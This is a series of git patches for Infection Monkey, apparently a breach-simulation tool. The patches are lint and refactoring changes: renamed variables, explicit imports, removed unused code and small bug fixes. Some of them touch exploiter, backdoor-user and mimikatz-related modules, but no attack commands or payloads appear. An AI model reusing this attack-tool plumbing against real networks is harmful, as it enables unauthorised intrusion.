import is_windows_os # Timeout for monkey connections TIMEOUT = 15 +LOOPBACK_NAME = b"lo" +SIOCGIFADDR = 0x8915 # get PA address +SIOCGIFNETMASK = 0x891b # get network PA mask +RTF_UP = 0x0001 # Route usable +RTF_REJECT = 0x0200 def get_host_subnets(): @@ -62,12 +67,6 @@ else: def get_routes(): # based on scapy implementation for route parsing - LOOPBACK_NAME = b"lo" - SIOCGIFADDR = 0x8915 # get PA address - SIOCGIFNETMASK = 0x891b # get network PA mask - RTF_UP = 0x0001 # Route usable - RTF_REJECT = 0x0200 - try: f = open("/proc/net/route", "r") except IOError: diff --git a/monkey/infection_monkey/transport/http.py b/monkey/infection_monkey/transport/http.py index eb1e5d355..7650cb229 100644 --- a/monkey/infection_monkey/transport/http.py +++ b/monkey/infection_monkey/transport/http.py @@ -64,7 +64,6 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler): if self.path != '/' + urllib.parse.quote(os.path.basename(self.filename)): self.send_error(500, "") return None, 0, 0 - f = None try: f = monkeyfs.open(self.filename, 'rb') except IOError: @@ -100,10 +99,10 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler): self.end_headers() return f, start_range, end_range - def log_message(self, format, *args): + def log_message(self, format_string, *args): LOG.debug("FileServHTTPRequestHandler: %s - - [%s] %s" % (self.address_string(), self.log_date_time_string(), - format % args)) + format_string % args)) class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): @@ -117,7 +116,6 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): def do_CONNECT(self): # just provide a tunnel, transfer the data with no modification req = self - reqbody = None req.path = "https://%s/" % req.path.replace(':443', '') u = urlsplit(req.path) @@ -148,9 +146,9 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): update_last_serve_time() conn.close() - def log_message(self, format, *args): + def log_message(self, format_string, *args): LOG.debug("HTTPConnectProxyHandler: %s - [%s] %s" % - (self.address_string(), self.log_date_time_string(), format % args)) + (self.address_string(), self.log_date_time_string(), format_string % args)) class HTTPServer(threading.Thread): diff --git a/monkey/monkey_island/cc/environment/environment.py b/monkey/monkey_island/cc/environment/environment.py index 6115e8dd9..868e6ec36 100644 --- a/monkey/monkey_island/cc/environment/environment.py +++ b/monkey/monkey_island/cc/environment/environment.py @@ -34,8 +34,8 @@ def load_server_configuration_from_file(): def load_env_from_file(): - config_json = load_server_configuration_from_file() - return config_json['server_config'] + loaded_config_json = load_server_configuration_from_file() + return loaded_config_json['server_config'] try: diff --git a/monkey/monkey_island/cc/models/monkey.py b/monkey/monkey_island/cc/models/monkey.py index 1a0e872f6..c257ae298 100644 --- a/monkey/monkey_island/cc/models/monkey.py +++ b/monkey/monkey_island/cc/models/monkey.py @@ -132,7 +132,7 @@ def is_monkey(object_id): try: _ = Monkey.get_single_monkey_by_id(object_id) return True - except: + except MonkeyNotFoundError: return False diff --git a/monkey/monkey_island/cc/services/config.py b/monkey/monkey_island/cc/services/config.py index 09771302d..641da8055 100644 --- a/monkey/monkey_island/cc/services/config.py +++ b/monkey/monkey_island/cc/services/config.py @@ -144,7 +144,7 @@ class ConfigService: if should_encrypt: try: ConfigService.encrypt_config(config_json) - except KeyError as e: + except KeyError: logger.error('Bad configuration file was submitted.') return False mongo.db.config.update({'name': 'newconfig'}, {"$set": config_json}, upsert=True) @@ -154,9 +154,9 @@ class ConfigService: @staticmethod def init_default_config(): if ConfigService.default_config is None: - defaultValidatingDraft4Validator = ConfigService._extend_config_with_default(Draft4Validator) + default_validating_draft4_validator = ConfigService._extend_config_with_default(Draft4Validator) config = {} - defaultValidatingDraft4Validator(SCHEMA).validate(config) + default_validating_draft4_validator(SCHEMA).validate(config) ConfigService.default_config = config @staticmethod @@ -207,15 +207,15 @@ class ConfigService: # Do it only for root. if instance != {}: return - for property, subschema in list(properties.items()): + for property1, subschema1 in list(properties.items()): main_dict = {} - for property2, subschema2 in list(subschema["properties"].items()): + for property2, subschema2 in list(subschema1["properties"].items()): sub_dict = {} for property3, subschema3 in list(subschema2["properties"].items()): if "default" in subschema3: sub_dict[property3] = subschema3["default"] main_dict[property2] = sub_dict - instance.setdefault(property, main_dict) + instance.setdefault(property1, main_dict) for error in validate_properties(validator, properties, instance, schema): yield error diff --git a/monkey/monkey_island/cc/services/edge.py b/monkey/monkey_island/cc/services/edge.py index bf9417309..b026fa480 100644 --- a/monkey/monkey_island/cc/services/edge.py +++ b/monkey/monkey_island/cc/services/edge.py @@ -141,7 +141,7 @@ class EdgeService: @staticmethod def get_edge_label(edge): - NodeService = monkey_island.cc.services.node.NodeService + node_service = monkey_island.cc.services.node.NodeService from_id = edge["from"] to_id = edge["to"] @@ -153,9 +153,9 @@ class EdgeService: if is_monkey(to_id): to_label = get_monkey_label_by_id(to_id) else: - to_label = NodeService.get_node_label(NodeService.get_node_by_id(to_id)) + to_label = node_service.get_node_label(node_service.get_node_by_id(to_id)) - RIGHT_ARROW = "\u2192" return "%s %s %s" % (from_label, RIGHT_ARROW, to_label) +RIGHT_ARROW = "\u2192" diff --git a/monkey/monkey_island/cc/services/node.py b/monkey/monkey_island/cc/services/node.py index 0c0a873e8..da45509d7 100644 --- a/monkey/monkey_island/cc/services/node.py +++ b/monkey/monkey_island/cc/services/node.py @@ -56,9 +56,9 @@ class NodeService: accessible_from_nodes.append(from_node_label) accessible_from_nodes_hostnames.append(from_node_hostname) - for exploit in edge["exploits"]: - exploit["origin"] = from_node_label - exploits.append(exploit) + for edge_exploit in edge["exploits"]: + edge_exploit["origin"] = from_node_label + exploits.append(edge_exploit) exploits = sorted(exploits, key=lambda exploit: exploit['timestamp']) From fd70ecfe29980d0b44c2d4c38f56df17a3ec3de9 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 16:15:52 +0200 Subject: [PATCH 26/53] Intentional shadowing of builtins --- monkey/infection_monkey/monkeyfs.py | 1 + monkey/infection_monkey/system_info/__init__.py | 1 + 2 files changed, 2 insertions(+) diff --git a/monkey/infection_monkey/monkeyfs.py b/monkey/infection_monkey/monkeyfs.py index b65443c76..e64682501 100644 --- a/monkey/infection_monkey/monkeyfs.py +++ b/monkey/infection_monkey/monkeyfs.py @@ -52,6 +52,7 @@ def virtual_path(name): return "%s%s" % (MONKEYFS_PREFIX, name) +# noinspection PyShadowingBuiltins def open(name, mode='r', buffering=-1): # use normal open for regular paths, and our "virtual" open for monkeyfs:// paths if name.startswith(MONKEYFS_PREFIX): diff --git a/monkey/infection_monkey/system_info/__init__.py b/monkey/infection_monkey/system_info/__init__.py index ab8e0f7ba..7d4395af7 100644 --- a/monkey/infection_monkey/system_info/__init__.py +++ b/monkey/infection_monkey/system_info/__init__.py @@ -16,6 +16,7 @@ LOG = logging.getLogger(__name__) try: WindowsError except NameError: + # noinspection PyShadowingBuiltins WindowsError = psutil.AccessDenied __author__ = 'uri' From f8b38d9a8d6d5a4ce9f774c462a8c3f9e07074cb Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 16:16:05 +0200 Subject: [PATCH 27/53] Change is to isisntance for type checking --- monkey/infection_monkey/config.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/monkey/infection_monkey/config.py b/monkey/infection_monkey/config.py index 6b01761d1..f3936fe19 100644 --- a/monkey/infection_monkey/config.py +++ b/monkey/infection_monkey/config.py @@ -74,7 +74,7 @@ class Configuration(object): val_type = type(value) - if val_type is types.FunctionType or val_type is types.MethodType: + if isinstance(val_type, types.FunctionType) or isinstance(val_type, types.MethodType): continue if val_type in (type, ABCMeta): From 719088070e752774e3b1d17a57c33f3ed81f4353 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 16:16:19 +0200 Subject: [PATCH 28/53] Added todo --- monkey/infection_monkey/system_info/windows_info_collector.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/monkey/infection_monkey/system_info/windows_info_collector.py b/monkey/infection_monkey/system_info/windows_info_collector.py index 08ca6ff29..2c3696f44 100644 --- a/monkey/infection_monkey/system_info/windows_info_collector.py +++ b/monkey/infection_monkey/system_info/windows_info_collector.py @@ -35,7 +35,7 @@ class WindowsInfoCollector(InfoCollector): """ LOG.debug("Running Windows collector") super(WindowsInfoCollector, self).get_info() - #self.get_wmi_info() + # TODO: Think about returning self.get_wmi_info() self.get_installed_packages() from infection_monkey.config import WormConfiguration if WormConfiguration.should_use_mimikatz: From 6992902991de7189472a981bd5111c694da1e39f Mon Sep 17 00:00:00 2001 From: Shivank Date: Mon, 28 Oct 2019 22:53:07 +0530 Subject: [PATCH 29/53] JS File-saver dependency patch --- monkey/monkey_island/cc/ui/package.json | 1 - .../cc/ui/src/components/pages/ConfigurePage.js | 7 +++++-- 2 files changed, 5 insertions(+), 3 deletions(-) diff --git a/monkey/monkey_island/cc/ui/package.json b/monkey/monkey_island/cc/ui/package.json index 4da085836..bc63bfccb 100644 --- a/monkey/monkey_island/cc/ui/package.json +++ b/monkey/monkey_island/cc/ui/package.json @@ -75,7 +75,6 @@ "fetch": "^1.1.0", "file-saver": "^2.0.2", "filepond": "^4.2.0", - "js-file-download": "^0.4.4", "json-loader": "^0.5.7", "jwt-decode": "^2.2.0", "moment": "^2.22.2", diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js index 43dac797c..a5aeae3ec 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js @@ -1,7 +1,7 @@ import React from 'react'; import Form from 'react-jsonschema-form'; import {Col, Modal, Nav, NavItem} from 'react-bootstrap'; -import fileDownload from 'js-file-download'; +import FileSaver from "file-saver"; import AuthComponent from '../AuthComponent'; import { FilePond } from 'react-filepond'; import 'filepond/dist/filepond.min.css'; @@ -309,7 +309,10 @@ class ConfigurePageComponent extends AuthComponent { exportConfig = () => { this.updateConfigSection(); - fileDownload(JSON.stringify(this.state.configuration, null, 2), 'monkey.conf'); + const JSONString = JSON.stringify(this.state.configuration, null, 2); + const blob = new Blob([JSONString], {type: "text/plain;charset=utf-8"}); + + FileSaver.saveAs(blob, 'monkey.conf'); }; sendConfig() { From 797b6c58b9035431c4d6c42d5448e51f3933ba90 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 20:41:35 +0200 Subject: [PATCH 30/53] Removed some unused imports --- monkey/common/cloud/aws_service_test.py | 1 - monkey/infection_monkey/post_breach/actions/add_user.py | 1 - monkey/monkey_island/cc/environment/aws.py | 1 - monkey/monkey_island/cc/resources/version_update.py | 1 - monkey/monkey_island/cc/services/remote_run_aws.py | 1 - monkey/monkey_island/cc/services/reporting/report.py | 1 - .../cc/services/telemetry/zero_trust_tests/machine_exploited.py | 1 - 7 files changed, 7 deletions(-) diff --git a/monkey/common/cloud/aws_service_test.py b/monkey/common/cloud/aws_service_test.py index 25d1b8b6e..ae9c4b5d3 100644 --- a/monkey/common/cloud/aws_service_test.py +++ b/monkey/common/cloud/aws_service_test.py @@ -3,7 +3,6 @@ from .aws_service import filter_instance_data_from_aws_response import json - __author__ = 'shay.nehmad' diff --git a/monkey/infection_monkey/post_breach/actions/add_user.py b/monkey/infection_monkey/post_breach/actions/add_user.py index 09c8d4796..074e31460 100644 --- a/monkey/infection_monkey/post_breach/actions/add_user.py +++ b/monkey/infection_monkey/post_breach/actions/add_user.py @@ -13,4 +13,3 @@ class BackdoorUser(PBA): POST_BREACH_BACKDOOR_USER, linux_cmd=' '.join(linux_cmds), windows_cmd=windows_cmds) - diff --git a/monkey/monkey_island/cc/environment/aws.py b/monkey/monkey_island/cc/environment/aws.py index 797a395aa..18db5c376 100644 --- a/monkey/monkey_island/cc/environment/aws.py +++ b/monkey/monkey_island/cc/environment/aws.py @@ -1,7 +1,6 @@ import monkey_island.cc.auth from monkey_island.cc.environment import Environment from common.cloud.aws_instance import AwsInstance -from Crypto.Hash import SHA3_512 __author__ = 'itay.mizeretz' diff --git a/monkey/monkey_island/cc/resources/version_update.py b/monkey/monkey_island/cc/resources/version_update.py index 5b34f4206..b1fbfdf82 100644 --- a/monkey/monkey_island/cc/resources/version_update.py +++ b/monkey/monkey_island/cc/resources/version_update.py @@ -2,7 +2,6 @@ import flask_restful import logging from monkey_island.cc.environment.environment import env -from monkey_island.cc.auth import jwt_required from monkey_island.cc.services.version_update import VersionUpdateService __author__ = 'itay.mizeretz' diff --git a/monkey/monkey_island/cc/services/remote_run_aws.py b/monkey/monkey_island/cc/services/remote_run_aws.py index 4ec1fd427..c81e0bc4a 100644 --- a/monkey/monkey_island/cc/services/remote_run_aws.py +++ b/monkey/monkey_island/cc/services/remote_run_aws.py @@ -1,6 +1,5 @@ import logging -from monkey_island.cc.services.config import ConfigService from common.cloud.aws_instance import AwsInstance from common.cloud.aws_service import AwsService from common.cmd.aws.aws_cmd_runner import AwsCmdRunner diff --git a/monkey/monkey_island/cc/services/reporting/report.py b/monkey/monkey_island/cc/services/reporting/report.py index 01be940c4..6a44679a4 100644 --- a/monkey/monkey_island/cc/services/reporting/report.py +++ b/monkey/monkey_island/cc/services/reporting/report.py @@ -12,7 +12,6 @@ from monkey_island.cc.database import mongo from monkey_island.cc.models import Monkey from monkey_island.cc.services.config import ConfigService from monkey_island.cc.services.configuration.utils import get_config_network_segments_as_subnet_groups -from monkey_island.cc.services.edge import EdgeService from monkey_island.cc.services.node import NodeService from monkey_island.cc.services.reporting.pth_report import PTHReportService from monkey_island.cc.services.reporting.report_exporter_manager import ReportExporterManager diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py index 454f3a7fe..59ba296cd 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py @@ -1,5 +1,4 @@ from common.data.zero_trust_consts import * -from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event From f430bfb940e07ee41a9badc1d13e9bc2362d4980 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 20:43:01 +0200 Subject: [PATCH 31/53] Changed info to debug in tests --- monkey/monkey_island/cc/models/test_monkey.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/monkey/monkey_island/cc/models/test_monkey.py b/monkey/monkey_island/cc/models/test_monkey.py index 5d81e0b1d..3c10ca7d7 100644 --- a/monkey/monkey_island/cc/models/test_monkey.py +++ b/monkey/monkey_island/cc/models/test_monkey.py @@ -142,7 +142,7 @@ class TestMonkey(IslandTestCase): cache_info_after_query_1 = Monkey.get_label_by_id.storage.backend.cache_info() self.assertEqual(cache_info_after_query_1.hits, 0) self.assertEqual(cache_info_after_query_1.misses, 1) - logger.info("1) ID: {} label: {}".format(linux_monkey.id, label)) + logger.debug("1) ID: {} label: {}".format(linux_monkey.id, label)) self.assertIsNotNone(label) self.assertIn(hostname_example, label) @@ -150,7 +150,7 @@ class TestMonkey(IslandTestCase): # should be cached label = Monkey.get_label_by_id(linux_monkey.id) - logger.info("2) ID: {} label: {}".format(linux_monkey.id, label)) + logger.debug("2) ID: {} label: {}".format(linux_monkey.id, label)) cache_info_after_query_2 = Monkey.get_label_by_id.storage.backend.cache_info() self.assertEqual(cache_info_after_query_2.hits, 1) self.assertEqual(cache_info_after_query_2.misses, 1) @@ -160,7 +160,7 @@ class TestMonkey(IslandTestCase): # should be a miss label = Monkey.get_label_by_id(linux_monkey.id) - logger.info("3) ID: {} label: {}".format(linux_monkey.id, label)) + logger.debug("3) ID: {} label: {}".format(linux_monkey.id, label)) cache_info_after_query_3 = Monkey.get_label_by_id.storage.backend.cache_info() logger.debug("Cache info: {}".format(str(cache_info_after_query_3))) # still 1 hit only From 75bff2264925a9251bd403c10bbb0a82d24a97ee Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 20:59:30 +0200 Subject: [PATCH 32/53] Changed import * to explicit imports --- monkey/common/network/segmentation_utils_test.py | 2 +- .../infection_monkey/exploit/tools/payload_parsing_test.py | 1 - monkey/infection_monkey/exploit/web_rce.py | 3 ++- monkey/infection_monkey/utils/users.py | 2 -- .../cc/models/zero_trust/test_aggregate_finding.py | 2 +- monkey/monkey_island/cc/models/zero_trust/test_finding.py | 2 +- .../cc/services/reporting/test_zero_trust_service.py | 7 ++++++- .../cc/services/reporting/zero_trust_service.py | 5 ++++- .../cc/services/telemetry/processing/__init__.py | 7 ------- .../cc/services/telemetry/processing/post_breach.py | 2 +- .../cc/services/telemetry/processing/processing.py | 3 ++- .../services/telemetry/zero_trust_tests/data_endpoints.py | 3 ++- .../telemetry/zero_trust_tests/machine_exploited.py | 2 +- 13 files changed, 21 insertions(+), 20 deletions(-) diff --git a/monkey/common/network/segmentation_utils_test.py b/monkey/common/network/segmentation_utils_test.py index 221f1d9bf..9dea1af19 100644 --- a/monkey/common/network/segmentation_utils_test.py +++ b/monkey/common/network/segmentation_utils_test.py @@ -1,4 +1,4 @@ -from common.network.network_range import * +from common.network.network_range import CidrRange from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst from monkey_island.cc.testing.IslandTestCase import IslandTestCase diff --git a/monkey/infection_monkey/exploit/tools/payload_parsing_test.py b/monkey/infection_monkey/exploit/tools/payload_parsing_test.py index 23358a290..315216d5f 100644 --- a/monkey/infection_monkey/exploit/tools/payload_parsing_test.py +++ b/monkey/infection_monkey/exploit/tools/payload_parsing_test.py @@ -29,4 +29,3 @@ class TestPayload(TestCase): array2[1] == "prefix5678suffix" and len(array2) == 2) assert test1 and test2 - diff --git a/monkey/infection_monkey/exploit/web_rce.py b/monkey/infection_monkey/exploit/web_rce.py index 1b5b9d75b..672861355 100644 --- a/monkey/infection_monkey/exploit/web_rce.py +++ b/monkey/infection_monkey/exploit/web_rce.py @@ -4,9 +4,10 @@ from posixpath import join from abc import abstractmethod from infection_monkey.exploit import HostExploiter -from infection_monkey.model import * from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline from infection_monkey.exploit.tools.http_tools import HTTPTools +from infection_monkey.model import CHECK_COMMAND, ID_STRING, GET_ARCH_LINUX, GET_ARCH_WINDOWS, BITSADMIN_CMDLINE_HTTP, \ + POWERSHELL_HTTP_UPLOAD, WGET_HTTP_UPLOAD, DOWNLOAD_TIMEOUT, CHMOD_MONKEY, RUN_MONKEY, MONKEY_ARG, DROPPER_ARG from infection_monkey.network.tools import check_tcp_port, tcp_port_to_service from infection_monkey.telemetry.attack.t1197_telem import T1197Telem from common.utils.attack_utils import ScanStatus, BITS_UPLOAD_STRING diff --git a/monkey/infection_monkey/utils/users.py b/monkey/infection_monkey/utils/users.py index 68148d9e9..b2f29db85 100644 --- a/monkey/infection_monkey/utils/users.py +++ b/monkey/infection_monkey/utils/users.py @@ -6,5 +6,3 @@ def get_commands_to_add_user(username, password): linux_cmds = get_linux_commands_to_add_user(username) windows_cmds = get_windows_commands_to_add_user(username, password) return linux_cmds, windows_cmds - - diff --git a/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py index 161f064b2..59bf1aa66 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import * +from common.data.zero_trust_consts import TEST_MALICIOUS_ACTIVITY_TIMELINE, STATUS_VERIFY, EVENT_TYPE_MONKEY_NETWORK from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.models.zero_trust.finding import Finding diff --git a/monkey/monkey_island/cc/models/zero_trust/test_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_finding.py index 3b9dcbf33..d61478641 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_finding.py @@ -1,6 +1,6 @@ from mongoengine import ValidationError -from common.data.zero_trust_consts import * +from common.data.zero_trust_consts import STATUS_FAILED, TEST_SEGMENTATION, EVENT_TYPE_MONKEY_NETWORK from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.testing.IslandTestCase import IslandTestCase diff --git a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py index d77e67aad..a43da8416 100644 --- a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py +++ b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py @@ -1,4 +1,9 @@ -from common.data.zero_trust_consts import * +from common.data.zero_trust_consts import AUTOMATION_ORCHESTRATION, DATA, PRINCIPLES, PRINCIPLE_DATA_TRANSIT, STATUS_FAILED, \ + TESTS_MAP, TEST_DATA_ENDPOINT_HTTP, TEST_EXPLANATION_KEY, STATUS_UNEXECUTED, TEST_DATA_ENDPOINT_ELASTIC, DEVICES, \ + PRINCIPLE_ENDPOINT_SECURITY, TEST_MACHINE_EXPLOITED, TEST_ENDPOINT_SECURITY_EXISTS, NETWORKS, PRINCIPLE_SEGMENTATION, \ + TEST_SEGMENTATION, PRINCIPLE_USER_BEHAVIOUR, STATUS_VERIFY, TEST_SCHEDULED_EXECUTION, PRINCIPLE_USERS_MAC_POLICIES, \ + TEST_COMMUNICATE_AS_NEW_USER, PRINCIPLE_ANALYZE_NETWORK_TRAFFIC, TEST_MALICIOUS_ACTIVITY_TIMELINE, \ + PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES, TEST_TUNNELING, PEOPLE, VISIBILITY_ANALYTICS, WORKLOADS, STATUS_PASSED from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.services.reporting.zero_trust_service import ZeroTrustService from monkey_island.cc.testing.IslandTestCase import IslandTestCase diff --git a/monkey/monkey_island/cc/services/reporting/zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/zero_trust_service.py index 04f661b28..24bd81e0d 100644 --- a/monkey/monkey_island/cc/services/reporting/zero_trust_service.py +++ b/monkey/monkey_island/cc/services/reporting/zero_trust_service.py @@ -1,5 +1,8 @@ import json -from common.data.zero_trust_consts import * + +from common.data.zero_trust_consts import PILLARS, STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED, \ + PILLARS_TO_TESTS, TESTS_MAP, PILLARS_KEY, PRINCIPLES_TO_TESTS, PRINCIPLES_TO_PILLARS, PRINCIPLES, ORDERED_TEST_STATUSES, \ + TEST_EXPLANATION_KEY, FINDING_EXPLANATION_BY_STATUS_KEY from monkey_island.cc.models.zero_trust.finding import Finding diff --git a/monkey/monkey_island/cc/services/telemetry/processing/__init__.py b/monkey/monkey_island/cc/services/telemetry/processing/__init__.py index 966877967..e69de29bb 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/__init__.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/__init__.py @@ -1,7 +0,0 @@ -# import all implemented hooks, for brevity of hooks.py file -from .tunnel import process_tunnel_telemetry -from .state import process_state_telemetry -from .exploit import process_exploit_telemetry -from .scan import process_scan_telemetry -from .system_info import process_system_info_telemetry -from .post_breach import process_post_breach_telemetry diff --git a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py index c64849905..b0e2eb8b7 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py @@ -1,5 +1,5 @@ +from common.data.post_breach_consts import POST_BREACH_COMMUNICATE_AS_NEW_USER from monkey_island.cc.database import mongo -from common.data.post_breach_consts import * from monkey_island.cc.models import Monkey from monkey_island.cc.services.telemetry.zero_trust_tests.communicate_as_new_user import test_new_user_communication diff --git a/monkey/monkey_island/cc/services/telemetry/processing/processing.py b/monkey/monkey_island/cc/services/telemetry/processing/processing.py index 36f75fdbd..f6ddcd970 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/processing.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/processing.py @@ -1,6 +1,7 @@ import logging -from monkey_island.cc.services.telemetry.processing import * +from monkey_island.cc.services.telemetry.processing import process_tunnel_telemetry, process_state_telemetry, \ + process_exploit_telemetry, process_scan_telemetry, process_system_info_telemetry, process_post_breach_telemetry logger = logging.getLogger(__name__) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py index b4e0bb4ec..e6afcf088 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py @@ -1,7 +1,8 @@ import json from common.data.network_consts import ES_SERVICE -from common.data.zero_trust_consts import * +from common.data.zero_trust_consts import STATUS_PASSED, EVENT_TYPE_MONKEY_NETWORK, STATUS_FAILED, TEST_DATA_ENDPOINT_HTTP, \ + TEST_DATA_ENDPOINT_ELASTIC from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py index 59ba296cd..fe0015576 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import * +from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK, STATUS_PASSED, STATUS_FAILED, TEST_MACHINE_EXPLOITED from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event From d69976f4b5a5c0c2af2d2996c60eab5371fb54ac Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:03:51 +0200 Subject: [PATCH 33/53] Fixed unresolved reference self.host instead of host --- monkey/infection_monkey/exploit/web_rce.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/monkey/infection_monkey/exploit/web_rce.py b/monkey/infection_monkey/exploit/web_rce.py index 672861355..b894acf43 100644 --- a/monkey/infection_monkey/exploit/web_rce.py +++ b/monkey/infection_monkey/exploit/web_rce.py @@ -257,7 +257,7 @@ class WebRCE(HostExploiter): if 'No such file' in resp: return False else: - LOG.info("Host %s was already infected under the current configuration, done" % str(host)) + LOG.info("Host %s was already infected under the current configuration, done" % str(self.host)) return True def check_remote_files(self, url): @@ -285,7 +285,7 @@ class WebRCE(HostExploiter): """ ports = self.get_open_service_ports(ports, names) if not ports: - LOG.info("All default web ports are closed on %r, skipping", str(host)) + LOG.info("All default web ports are closed on %r, skipping", str(self.host)) return False else: return ports @@ -462,7 +462,7 @@ class WebRCE(HostExploiter): """ src_path = get_target_monkey(self.host) if not src_path: - LOG.info("Can't find suitable monkey executable for host %r", host) + LOG.info("Can't find suitable monkey executable for host %r", self.host) return False # Determine which destination path to use dest_path = self.get_monkey_upload_path(src_path) From 40494d3c3c2e3e2649685773cb316845c9242301 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:11:05 +0200 Subject: [PATCH 34/53] Auto reformat all code --- monkey/infection_monkey/dropper.py | 2 +- monkey/infection_monkey/example.conf | 206 +++++++------- .../infection_monkey/exploit/elasticgroovy.py | 4 +- monkey/infection_monkey/exploit/mssqlexec.py | 7 +- monkey/infection_monkey/exploit/shellshock.py | 2 +- .../exploit/tools/exceptions.py | 2 - .../infection_monkey/exploit/tools/helpers.py | 2 +- .../exploit/tools/payload_parsing.py | 2 +- .../exploit/tools/smb_tools.py | 1 + monkey/infection_monkey/exploit/weblogic.py | 3 - .../infection_monkey/exploit/win_ms08_067.py | 10 +- monkey/infection_monkey/exploit/wmiexec.py | 1 - monkey/infection_monkey/model/__init__.py | 24 +- monkey/infection_monkey/monkey.py | 2 +- monkey/infection_monkey/network/info.py | 1 - .../network/mssql_fingerprint.py | 1 - .../infection_monkey/network/tcp_scanner.py | 1 - .../post_breach/actions/users_custom_pba.py | 1 + monkey/infection_monkey/post_breach/pba.py | 2 +- .../post_breach/post_breach_handler.py | 1 + monkey/infection_monkey/pyinstaller_utils.py | 1 - .../system_info/linux_info_collector.py | 1 - .../system_info/windows_info_collector.py | 1 + .../system_info/wmi_consts.py | 1 - monkey/infection_monkey/system_singleton.py | 1 - monkey/infection_monkey/transport/__init__.py | 1 - monkey/infection_monkey/transport/tcp.py | 4 +- monkey/monkey_island/cc/app.py | 1 - monkey/monkey_island/cc/island_logger.py | 1 - .../cc/island_logger_default_config.json | 60 ++--- monkey/monkey_island/cc/main.py | 1 + monkey/monkey_island/cc/models/monkey.py | 1 + monkey/monkey_island/cc/models/test_monkey.py | 1 - .../cc/models/zero_trust/test_finding.py | 1 + .../cc/resources/attack/attack_config.py | 1 - .../monkey_island/cc/resources/local_run.py | 1 + monkey/monkey_island/cc/resources/monkey.py | 1 + monkey/monkey_island/cc/resources/netmap.py | 2 - .../cc/resources/pba_file_download.py | 1 + 